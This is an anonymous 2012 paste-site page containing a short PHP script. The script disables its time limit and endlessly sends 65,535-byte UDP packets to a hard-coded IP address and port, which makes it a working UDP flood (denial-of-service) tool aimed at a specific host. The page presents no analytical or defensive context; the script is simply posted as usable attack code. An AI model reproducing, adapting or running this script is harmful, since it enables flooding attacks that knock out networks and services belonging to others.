FreeTextHost.in host your text & codes anonymously


FREE TEXT HOST

You can save codes, scripts, sources & general debugging text and share / access / use them at any time (anonymously).
You can even set yourself a password if you want to keep it just for yourself.

Posted by "Anonymous" on Fri, June 22nd, 2012, 2:15 AM - Never Expires (Modification of post by Anonymous)
View followups from Anonymous | Download | New paste

  1. <?php
  2.  
  3.  
  4. set_time_limit(0);
  5. //ignore_user_abort(FALSE);
  6.  
  7. $ip = "177.8.168.70:7777";
  8. $rand = 7777;
  9. $out = "";
  10.  
  11.  
  12.  
  13. for($i=0;$i<65535;$i++){
  14.         $out .= "X";
  15. }
  16.  
  17. while(1) {
  18.         $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
  19.         if($fp){
  20.                 fwrite($fp, $out);
  21.                 fclose($fp);   
  22.         }
  23. }
  24.  
  25. ?>
Language:
To highlight particular lines, prefix each line with @@








freetexthost.in © 2010-2013 - Powered by PASTE 1.0   website by GandhiG.com